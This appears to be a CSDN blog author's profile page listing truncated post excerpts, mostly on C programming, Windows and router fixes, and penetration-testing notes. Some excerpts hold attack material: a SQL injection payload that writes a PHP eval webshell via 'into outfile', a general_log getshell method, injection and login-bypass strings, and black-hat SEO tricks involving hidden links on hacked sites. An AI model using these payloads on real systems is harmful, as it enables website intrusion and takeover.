3 Blue_Starry_sky

尚未进行身份认证

暂无相关描述

等级
TA的排名 7w+

渗透测试流程

1.信息收集主动收集通过访问目标地址,和相关地址或者通过扫描等方式收集信息;优点:收集到的信息比较多;缺点:可能会被记录自己的操作信息,导致打草惊蛇;被动收集通过第三方的服务来收集目标的相关信息;优点:基本上对方处于无感知状态;缺点:收集内容有限,速度较慢;一般情况下,最好先采用被动收集的方法去收集信息,然后采用主动收集去有目的的收集在被动收集过程中缺少的信息;需要收集的信息...

2019-04-19 15:49:21

黑帽SEO手法

0x00:概念SEO全称搜索引擎优化,通过站内优化和站内优化方式来提升搜索引擎排名,有白帽SEO和黑帽SEO。因为正规的SEO优化需要很长时间,黑帽SEO手法让站内快速提升排名的有: 黑链(暗链) 站群 网站劫持(搜索引擎劫持) 桥页 0x01:SEO的一些黑色手法常见的SEO手法: 利用泛解析做站群 入侵高权重网站挂暗链 ...

2019-04-03 10:06:32

Linux 查看日志命令

Linux日志分类、各个日志作用:last:列出当前和曾经登入系统的用户信息-R显示从何处登入系统(不显示登入系统的主机名称或ip地址)-a把从何处登入系统的主机名称或ip地址显示在最后一行-f<记录文件>指定记录文件-nn是指列数列出名单的显示列数-x显示系统关机,重新开机,以及执行等级的改变等信息。查看所有重启、关机记录:last|grep...

2019-03-18 11:41:13

sql语句利用into outfile写入一句话

利用需要的条件有:1、对web目录需要有写权限能够使用单引号2、知道绝对路径3、没有配置-secure-file-priv当知道路径时,可以直接用?id=1unionselect"<?php@eval($_POST['123']);?>"intooutfile("C:/phpStudy/WWW/a.php")或者采用PHPmyadmin,选择一个数据库如...

2019-03-04 15:32:44

利用general_log来getshell

设置了general_log和general_log_file之后所有SQL记录都会写入指定的文件使用showvariableslike'%general%';//查询general_log的开启状态如图如果没有开启可以使用setglobalgeneral_log=on;//将其打开。然后使用setglobalgeneral_log_file='...

2019-03-04 15:27:04

常见漏洞与分析

一、SQL注入(1)注入产生原理使用用户输入的参数拼凑SQL语句,用户对服务器端代码里的SQL语句可控,使服务器执行恶意的sql命令http://bbs.pconline.com.cn/topic.jsp?tid=1 'and1=2(2)万能密码select*fromtb_namewherename=''or1=1--' and passwd=''(3)危害...

2018-07-15 14:54:23

AIT刚发现的小功能之快捷键

经常在网上浏览文章的人会看到类似这样的文章,史上最全常用快捷键之类的。其中方便的快捷键有很多,但是我们并不能完全的记忆下来,能背下的也就是常用的那么几个。刚刚无意间按到了Alt发现你需要的快捷组合会显示出来,如图。微软的很实用的小功能,不清楚那个版本会有这个功能,我的是win10专业版...

2018-03-03 17:27:03

使用word写博客

一直觉得csdn写博客的时候上传图片不太舒服,想着能用word写博客挺好。于是从百度上查了一下,果然中国的网友还是很强大的,下面介绍如何使用word连接博客。在百度经验上看的,好像office2007以上的完整版才有这个功能。在这里我的电脑用的13版的,如果需要07版的,我这里附上链接https://jingyan.baidu.com/article/8ebacdf0db266749f65cd

2018-03-03 17:14:37

无线路由器桥接(以不同品牌为例tplink和fast)

一般上,TP-link的路由器要好于FAST的路由器,所以在这里我使用tplink作为主路由器。首先,我也在网上看了一些教程,什么把信道保持一致,DPCP服务关闭,我试了一下,不需要保持一致,dhcp不关闭也没见有啥。但是,如果想要更好的无线感受,可以把信道都换成11或者1。然后记下主路由器的lan口ip,把副路由器的lan口ip改成主路由器的子网ip,要不然桥接后会出现管理界面无

2018-01-29 22:53:41

硬盘根目录只能创建文件夹解决方法

以前的废电脑拆下来的机械硬盘做成了移动硬盘,然而发现根目录下只能创建文件夹,其他的东西没有,如下。然后找到不正常的盘上右键选属性,在属性框里选择安全,选中Everyone点下方的编辑,在弹出的框里“Everyone的权限”里把全部控制的勾勾上,应用并确认。如果硬盘里东西比较多的话可能权限设置时间会比较长,等权限设置完成后新建选项就正常了。

2018-01-05 20:21:07

win10下出现.net framework 3.5错误代码0x800F081F的问题

在帮别人装CAD的时候,出现了这个问题,一开始上百度查找解决方法,说的是从管理→服务→windowsUpdate→属性,启动类型选成手动,然后启动。后来试了试,发现这个方法并不行,然后又在网站找大牛的解决方法,终于找到了方法。复制链接:http://download.windowsupdate.com/d/msdownload/update/software/updt/2015/11/mic...

2017-12-27 00:21:13

C语言continue和break的区别

break是结束整个循环体,continue是结束单次循环通过下面这个程序我们来直观的看一下break和continue的区别continue语句:#includeintmain(){ inti; for(i=1;i<20;i++) { if(i%3==0) { printf("%d\n",i); continue; } printf("i==

2017-09-16 11:22:11

C语言for循环语句的执行顺序

#includeintmain(){ inti; for(i=0;i<5;i++) { printf("%d\n",i); } return0;}执行数序是:1、i=0 初始化初值2.i执行循环体代码i++变量i自增回到第2步,一直循环下去,直到第2步为假,退出循环.

2017-09-16 11:13:18

C语言switch的条件表达式要求

switch语句是多分支选择语句,一般当if嵌套过多的时候可以考虑使用。switch(表达式){case常量1:语句1case.....:.....default:语句n}switch只针对基本数据类型使用,即switch后面括号内的表达式,其值得类型应为整数类型(包括字符型),也就是(int,char,枚举,bool),对于其他类型,应该考虑其他条件控制语句例如i

2017-09-16 10:12:17

C语言值传递与地址传递

在我们学习C语言函数部分的时候,书上写的实参向形参的数据传递是‘值传递’,是单向传递,只能由实参传递给形参,而不能由形参传递给实参。由于这个特性,我们可能在写程序时,有些函数内改变了一些值,运行结果会数值却没有发生变化。例如例一::当我们学习到指针部分时,会接触到‘地址传递’,会发现有一份类似函数部分的程序却可以改变主函数的参数的数值。这是因为存放的是由主调函数放进来的实参变量的地址。...

2017-09-05 21:57:32

C语言形参和实参

形式参数(形参):定义函数名和函数体时需要用的参数,目的是用来接收调用该函数时传递的参数。实际参数(实参):传递给被调用函数的值。通俗的来讲,形参就像物理计算中的公式中的符号,比如Ω,A,V等,而实参就是在计算中的实际的数值。调用过程就是实现形参与实参的结合,把实参的值通过调用传递给形参,相当于把具体的值代入公式进行计算。 形式参数(形参)实

2017-09-05 21:44:50

C语言全局变量与局部变量及存储方式

由于变量的作用域不同,我们将变量分为全局变量和局部变量。局部变量一般是在一个函数内有效,只能在本函数内引用,其他函数不可用。全局变量一般是在函数外定义的变量,我们叫做全局变量。即在函数内定义的是局部变量,在函数外定义的是全局变量。来看这个程序。#includeintmain(){intx;voida();voidb();x=10;a(x);b

2017-08-27 10:07:20

mysql#1045错误如何消除

渗透测试过程中,有时我们会需要用到wampserver等类似的工具在本地搭建环境进行渗透测试,然而有一些环境是可以自动安装的,但是需要数据库密码,phpmyadmin可以很方便的更改localhost和127.0.0.1的密码,当密码更改后,如果我们需要清楚的查看数据库中的表信息或者数据信息,我们会继续使用phpmyadmin,但是我们会发现phpmyadmin无法进入,出现如图片的错误。这个

2017-04-23 13:25:43

windows下python2.7 pip的安装

本人的python版本是Python2.7.12的,一般的python2.*应该都是可以按照这个方法的。首先下载pip的包,网址是https://pypi.python.org/pypi/pip下载好后将此文件放在python目录下,然后进行解压。进入pip-9.0.1这个文件夹,按住shift然后点击右键,选择在此处打开命令窗口,如下图:输入命令

2017-03-22 19:55:25

John介绍及常用命令使用说明

john是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如DES、MD4、MD5等。John支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。在对john输入

2017-03-10 20:28:49

查看更多

勋章 我的勋章
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv1
    勤写标兵Lv1
    授予每个自然周发布1篇到3篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。